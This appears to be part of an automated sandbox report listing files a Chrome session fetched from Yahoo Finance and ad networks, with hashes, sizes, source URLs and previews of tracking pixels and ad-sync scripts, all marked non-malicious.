                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=APPNEXUS&partner_device_id=6863456619421248072&pt=ac3bc93e-fbbc-4b33-9ccf-b389f820d995%2C%2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2498)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.984712010022404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:FoOmAEdAPZMULQ25ikN3hyTIJTs33P0HV6R4GXruWDg:FcSZpLQ2wc3MmVgyAruL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:42E0642CBFA9DDC3D8264647BF38A226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7FB5B5F6BBD0FDD4EA5B96F92BA6F81F582CA1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:859FF301A8BA53BD7393A2D88BAAE1E18978EDD1EDFEC35D1BD2A40D2F75083B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3BE6E79DD528B7AEBA483942FB3DD07AAA332538650544A461A2BC7139DA120C33A13EACC94645D72D1C172E8203574F14AA43367DC737F2FA975266116B51D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/headerUtil.D8XWvN0j.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as f,d as u}from"./commonUtil.CI22_Irn.js";import{l as V,f as y}from"./logUtil.hOue7iAU.js";import{g}from"./i13nUtil.C-uBpR7k.js";function H(t){return typeof t=="string"?t:t.key}async function p(t,s){const{key:n,action:e,getComponent:a}=s;try{const[r,o]=await Promise.all([e(),typeof a=="function"?a().then(C=>C.default):Promise.resolve(void 0)]);return{key:n,action:e,getComponent:a,Component:o,error:!1,loading:!1,value:r}}catch(r){return V(t,{},{data:r,isCritical:!1,perfLabel:`loadLazy:${n}`}),{key:n,action:e,getComponent:a,error:!0,loading:!1}}}async function w(t,{action:s,getComponent:n,key:e,immediate:a=!1}){const[r,[o]]=await Promise.all([f(t),u(["lazy"],t)]),C=a||r.bot==="1"||r.mode==="failsafe",i={key:e,action:s,getComponent:n,loading:!0,error:!1};if(!C)return o.setEntry(e,i);const l=await p(t,i);return o.setEntry(e,l)}async function v(t,s){const n=H(s),[e]=await u(["lazy"],t),a=e.getEntry(n);if(!a||!a.loading)return a;const r=await p(t,a);return e.setEntry(n,r)}async fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3538214812563885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:tjhokNAcq1IwoHp/AnzM9jD+3EQjXkrLMwH3Fom2xZ9T7zRar:NyIwW/AnzKDMEQTkrLMS3FxM9T7zRar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:46EC7CD52EE9F5C1236B0DEA5072690A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF9337DE42260986BA6EC460E64AB5120A3E5445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96398EA031F2FABAC614F2A0719722AC6D4C531AFBC38D48C86DABD17D4D2D7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:84C8EA4CF4AEC794FAB79D1251396671D336CB275AF068C773B5F7A0BF40A867F58E1713DA8155E3CE5EB661F9FA65F6D7B1A2C47D4441798292BA2D1D4CA526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",device:"",intl:"",lang:"",meta:{},mode:"normal",region:"",rid:"",site:""},i13n:{}},a=["MAST","LDRB"],s=function(){var e,t,s,r,l,c=window,d=document,f=c.adsConfig,u=c.YAHOO,v=void 0===u?i:u,p=c.DARLA,m=void 0===p?null:p,h=c.wafer,g={},b="adRotateEvt",w="scroll",E="homepage-viewer",C="sda-",L=C+"LREC4",A=C+"MON2",y="native-leaderboard-ad",x="gemini-ad-refresh",R=!1;function O(){var o;if(f&&(t=f.rotation)&&(null===(o=null==f?void 0:f.positions)||void 0===o?void 0:o[t.currentpos]))if(f.clientPositionMeta.positions.forEach((function(e){g[e.id]=e})),r=g[t.currentpos],m)if(t.enableNavAdRotation&&h.on("fetch:success",(function(e){e.elem.classList.contains("nextgen-page-navigation")&&function(e){var t=c._darlaAutoEvt;t||(t=m.evtSettings("AUTO")||{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (27104)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361148094990428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:af8/g/Nl1s/stRfo0B2FwyNxdYKriRzCsvFvCuQ:afUoNlM0fYrDuCuQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C4F8F606E8D26E30B45D83965E4C0905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F791F5B936EAC352D7F483A12450E6B9DD064772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:27A7C1F2F2C7018314D78B422F71E0EDA4F6904F261E36D93956F65E308D82EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11F3BB13686F77E0D40829826CC45A1E456978FFFCB0677FA16F1E1AE9C2A1558A2048FF376D9B486B5263D8572367FF2031F9A07F3DCAB152A69FF15D98EAC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var comments = 'User-Sync: generated: 2024-09-25 20:33:51 PDT';.var rtb_sync = {"consent_rate":100,"reset_rate":0,"ttl":14,"sample":100,"max_pixels":16,"pixel_sets":{"rtb":{"sample":100,"pixels":{"1185":{"ttl":7,"img":"https:\/\/ad.turn.com\/r\/cs?pid=6","secure":{"img":"https:\/\/ad.turn.com\/r\/cs?pid=6"},"priority":7,"partner":"amobee"},"1902":{"priority":17,"ttl":2,"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0","secure":{"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0"},"partner":"quantcast"},"1986":{"priority":7,"ttl":1,"img":"https:\/\/ib.adnxs.com\/getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30","secure":{"img":"https:\/\/secure.adnxs.com\/getuidnb?https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30"},"partner":"xandr"},"2046":{"priority":13,"ttl":7,"img":"https:\/\/token.rubiconproject.com\/token?pid=2046&pt=n&a=1",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQEsJ+q:1QEsJ+q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.417372547705359
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:kHbLIfmzWGO5bBDM5hGOox1GOGU9dNbFGOh/gr51jGO+om62GOUj5MueOSy9DOGe:IIepEBDWobxkhYDb0SbT6FxUDyPe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B5F1AE3700AC47D8DD82E5ECD4FC979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4CE457BF33E1B4467A22AD57AD1C724613C2676A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8FB7A818AC2B2C4F2BDE9FD197981CA2B5C797007C1C2A8790CBD75FAB8F3AA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:65963C48C6FA9B90EE310B6D5EAB4B8B01B7CE87610E3A9B455B55FD591DBB1BC90488CDFADC9D051EDE2A4F429586E240BD1EE2A53452DE5A57278F86A8A6A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://rtb.gumgum.com/usync/prbds2s?gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dgumgum%26gdpr%3D0%26gdpr_consent%3D%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><head><title></title></head><body>.<img src="https://secure.adnxs.com/getuid?https://usersync.gumgum.com/usersync?b=apn&i=$UID" style="display:none;"/>.<img src="https://x.bidswitch.net/sync?ssp=gumgum2&user_id=e_3df9e241-f2f3-4194-840f-44582d5035d9&gdpr=0&gdpr_consent=&us_privacy=" style="display:none;"/>.<iframe src="https://c1.adform.net/serving/cookie/match?party=1301&gdpr=0&gdpr_consent=" style="display:none;"></iframe>.<img src="https://us-u.openx.net/w/1.0/cm?_={CACHEBUSTER}&id=47f31213-389c-4904-aaa6-9b11aab9c211&gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dopx%26i%3D" style="display:none;"/>.<img src="https://sync.srv.stackadapt.com/sync?nid=1&gdpr=0&gdpr_consent=" style="display:none;"/>.<iframe src="https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV8zZGY5ZTI0MS1mMmYzLTQxOTQtODQwZi00NDU4MmQ1MDM1ZDk=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv" style="display:none;"><
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):149336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.496490218548733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:1SERAbS2HYOmf1uZYB58lwhf+sNdkSWHGcZOqDsAF:1VW7HYOvZA58XMdfWfZCU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8F1C7F5187E8E78FDB31A5E6C688E803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:64B1EF52851B1C5B130BD7FC12576329D1738F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0598E13041B04BD01DC5E5849ABEBAC0E253BBAC3EC6BDC71CA62B84100717F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B5F744E0AF9D4736B542060471404E074FCA5769FFEBEF2BECD0A311329BAE985B97FFB52247E571EE0C2A9B7A99CB3FD5D91F21BD807A09D0A45FB651D12217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/pv/static/misc/voice-close-202105050733.wav:2f8292389d582e:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFFPG..WAVEfmt ........D... b.... .data.....r.6.>.7..6!'.7...5...7BU...O.7...FE.7D...7Ud...MQ7.;J.7&.7..t.j..6. ....)6m...x..O...?..eH..........7.5....m.........P..........L...%J....9...u,.........H=......H=..j0..>....3...Y.......+..Ud........ ..>..G".M..r.".....!.....s......FE...v......._..~....Pz..L....O.....r.".....k..5......y............5m..?.6.....6&.`.|.$7..-..MQ7.>..{7...._.7....v.7.k.6..7.\.6y..7..7..7$.<7D..7k.j7...7..7...7m.7...8.n.7 ..8...7...8.~.79..8k..7.x.8.1.74i.8...8...84i.8.+.8Q..8...7...8...7...8k..7~..8...7._.8...7...8G..7o..8...7[..8Ud.7C..8.L.7...8..o7.C.7j.E7.>.7A..7H..70F.6.@.7..6j..7BU.5.O.7Ud..m.7..~.. .7.!..>s7.~..~.H7..=.K..7D.e.0F.6......6#R.....5.J......&..............`...w...?0.h8!..".;.O.;i..<7..<+L.<..<.(.<...<...=6#.=..9=.\:=J.T=F.U=.:h=..h=..s=..t=.x=..y=..y=+Rz=Kzw=p.x=\.o=QMp=..d=..d=..\=.e]=..d=.Xe=.Q~=..~=...=.g.="{.=..=..=.#.=N.=.(.=4.=.1.=...=.i.=...={..=p.=.,.=[..=..=.O.=...=.e.=J.=...=...=...=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1437125988438455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:qVv/FTL//rLv+rGXIL//+ac4NGL:qF/pjv8V6X4QL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F4EFD6C3FB6FF75C0C266C1967109D39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AD1B3230DDF4DD734BEFD09DFB793619FDA0961F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5A8701497007489A6358A67AFD48C19F7421CC26F286E94388868A48BBE3FEBB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9838DF59D1174426B4F5B49B493A52B078FB4A8E33DC5DAE97D61F8AF97261DB6F3F143EC42ABEF2B2CAFC03ADD1D1773ABFD529DF17F2FE0C369A4E4B4076C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>. <body>. <script src="audio.js"></script>. </body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.908881043363959
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:UGZlNJ5YIbYxshYewdryjph5L9QPwSLizBFXdp32LkH8SpSkbWhpJOceux3X:UGxTYIjBwdryb5L9cwSOzBTqkH8SwkyR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AB2BBBDBE07A46E0E047850C62301F0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:01C54EF9FE29C5CA43E457C5CB4CAE52FFCCDA40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3418E6D1452040DFB46794119972418CDAE99FF6535915C79714FDA227B0E677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7E65306FB371792E30B2C0F926915C6BFD468AE73E3BA50955EEDE7B5B920D5C0390F3F4DA7EDE137E5BC60B9DF806681F9455C6C270A7F771007C7715E0D08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/6636.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.Z[s.G...I.%.....<. .....<.c#..].n&.....P.R../@ .;.*.T9..k|...J...n].:3..;.......z.U .....v.>..9.O..1o\....}......#..7....p.8lx-../K6tY.aY6...J.d$!..N.5..7.Y..q.......`2F..2....~O......r....m...l....% c..z....!..v..y.[..h..,a5B"F......d.e5<".$b.O...x..Ur..RxX....J.J@..,Y......t..F.:.[...v.2.r[.`....}.}.1..bZ..v.Jn+.(..0a.K.L3. .X..p.m%."`*.W.^1ze..#IE/.xg\n~s@.mc..2.J..Wt~.RQ.b....qV..)....F."d..~)t|([.a.......tdP^...A.Wu.Nn=..)..VOG.2....Ci...d9.(a.{....N.R....l..2Gm2..,v..... ......W.P....U.....P'..~....cIy..-..hY....|.`.Ic.KY...a)qh.:.....(v.2...".2.j..Y;r.....E[.%...Gur......T..i......E'N....}.6.k...N....bYD.$k@..p./?D.p.L.hA;..wv. .be.-.3.|..~.......(...{.W..uL[...y...!.Z6Fa.#2..g..o....5..5M...f..g.t+..5.P.,,..".....Z=.Z.M.LtPfC#b.....].LG...<..".|rf....w*....o......o..h;..UT..".........|....O:.......\o...G/T.h..E..........ex.7.),E.9.+.6.T..`...~Y%.YP.e.0....QG.......G...u.J>...[...,.G..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1010
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.753846191195984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:B53TwWHFN2eceUFa4zVO8pw9oroZhETpVbDs/Qf97:r8WNa5pyorWhETcoV7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0FB70690288109F594A3EE773A489890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0063896E70219950943A66B781DB9D3799702FB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8FC174251647F28D51D31F696603BCBAE579788915AC49818F93B1EF695F5853
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4B37EBF118D32FB1193365836ACF307907777B736E73795B3CC292A13E148F0476A840FBE02F98067E354C7408A2275B0C18B8C1552C71143A0AD185EC9632BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.=o.1.......?..l..V.F.{...$.1...T),.#.....,t..ta:...;........}}.......&._.O.G.M5.k.w9C..:...1..U....-.<_/.L.{.hi...].c.L..8a...#...+....&7i.....r.T?.I{.!.-B5.?;N.OU_..N.K..:I..}f.Yl.7O.^..Y}h.t..S..+.>...f..<H...y.Y..6.!a.....N.P..X..3..p.z-..D=x......e.-.......|i..u/`.......2.D...{..%=C....1.o.........L...^..s.~.s...9...b.p4m..aN#9.d.H.*^...R....._>.,......s....s.,:..`.K....R-6.\.L..JRbyl..2.E...`.O".<..V9.qU.!...0.......,U.x.......G....<.h....M....4E.. ..X......\......K.......sB.H..".`r......]a...v[.s.......f...'P..s....(W....=..r.....o .k.......%G I.gS;....0O[.'0.....Lj.....q..OUl7(5;.N.&..&V...*..8<.I.......S%..J...>g.T.w...*ows.!n....9"g....%.@K..5..sd.3....7..m...u/`b..R/Y...u/.....K;.r.1an...]...r..'7.8.......<~.......;..$nx..E.Wl5.h.<NWY..6....n(.....R........$....E.........:.*...+..{..3..D.]W..7O*.'.%.=.-I...!o...q.....u.W.t...oi....Xa......<_oQ?...|..7..B.1.y..s.-8..?..RV....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12610)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341220470097978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:/ytAo7LMRBuQTx+Zy3OYX2wUi6lbY9GhtItEUtAkUMLProxp9bteUh7zOOICrY:6rMGQTxmjpNYgtItEUtCbtDOYrY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2F446C93D8EBFEFA342A3C1033EB4DE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E922D3D3EDCE6B7F8203745428F7707EDF1A16CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7A984B733BA7593F858D8B90C4C16A5C0FC2E1CDA11AF263EF9F0619A2630EBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:150C94D2FCA90C71AFFF7AD2348C369235362C115BE69667EE4460CB0E29CFA4C83A665915A22A2ABE548866B73C38DCF0D71D1146BA2CC295BA1083C56C4F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/879366/prod_studio_01_252_videomodule.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:self.studioLoader.context.evalInContext("window.STUDIO_SDK_START=+new Date();var wo={},xo=/OS (\\S+) like/,yo=/Android (\\S+);/;function zo(a,b){wo[b]==null&&((a=a.exec(ob()))?(a=a[1].replace(/_/g,\".\"),wo[b]=jb(a,b)>=0):wo[b]=!1);return wo[b]};var Ao=function(){M.call(this);this.l=this.o=this.j=!1;this.h=0;this.v=[];this.C=!1};p(Ao,M);var Bo=function(a,b){b==null||a.j||(a.g=b,a.D=!ec&&!fc,a.I=ec||fc,a.D?a.g.addEventListener(\"click\",v(a.A,a),!1):a.I&&(a.g.addEventListener(\"touchstart\",v(a.N,a),!1),a.g.addEventListener(\"touchmove\",v(a.G,a),!1),a.g.addEventListener(\"touchend\",v(a.H,a),!1)),a.j=!0)},Co=function(a){a.g!=null&&a.j&&(a.j=!1,a.D?a.g.removeEventListener(\"click\",v(a.A,a),!1):a.I&&(a.g.removeEventListener(\"touchstart\",v(a.N,a),!1),a.g.removeEventListener(\"touchmove\",v(a.G,a),!1),a.g.removeEventListener(\"touchend\",v(a.H,a),!1)))};Ao.prototype.N=function(a){this.o=!0;this.h=a.touches.length;this.C=Do(this,a.touches)||a.touches.length!=1;a=a.touches;this.v=[];for(v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
